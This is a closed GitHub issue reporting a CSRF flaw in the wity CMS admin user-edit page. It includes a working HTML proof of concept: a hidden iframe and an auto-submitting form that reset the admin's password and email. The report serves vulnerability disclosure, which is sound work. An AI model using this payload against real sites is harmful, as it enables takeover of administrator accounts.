Skip to content

CSRF on admin/user/edit page lead to full account take over  #153

Closed
@chhaipov

Description

@chhaipov

Hello,

I came across and tried to find bug on this CMS. I see that user edit page is vulnerable to CSRF attack because there is no CSRF token to validate user's request. it means that if an admin user visits crafted url made by attacker (via XSS or Phishing), a POST request will be generated and be submitted to wity/admin/user/edit/1 that will change admin user information included password and email address.

once exploited, attacker can fully take over admin's account.

Affect url: http://192.168.56.200/wity/admin/user/edit/1

Steps to reproduce:

  1. Check POST request when user edit information on /wity/admin/user/edit/1
    image

  2. Build CSRF POC based on POST request from user/edit and store it in attacker’s site

    <iframe id="test" name="test" style="display:none"> 

    </iframe> 

    <form action="http://192.168.56.200/wity/admin/user/edit/1" method="post" id="the_form" style="display:none" target="test">    

        <input type="hidden" name="id" value="1"  /> 

        <input type="hidden" name="nickname" value="admin"  /> 

        <input type="hidden" name="password" value="csrf123"  /> 

        <input type="hidden" name="password_conf" value="csrf123"  /> 

        <input type="hidden" name="email" value="csrf@test.com"  /> 

        <input type="hidden" name="groupe" value="0"  /> 

        <input type="hidden" name="type" value="all"  />     

        <input type="submit" value="Change Password"  /> 

    </form> 

    <script type="text/javascript"> 

    //<![CDATA[ 

        var $form = document.getElementById ('the_form'); 

        $form.submit (); 

    //]]> 

    </script> 

</div> 
  1. Let user access CSRF POC in attacker’s site and then POST request will be generated and requested to http://192.168.56.200/wity/admin/user/edit/1
    Visiting attacker site:
    image
    POST request generated:
    image

  2. After that, user’s information will be changed to value attacker put on CSRF POC

Mitigation:

Original password is needed in order to change new password of user
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions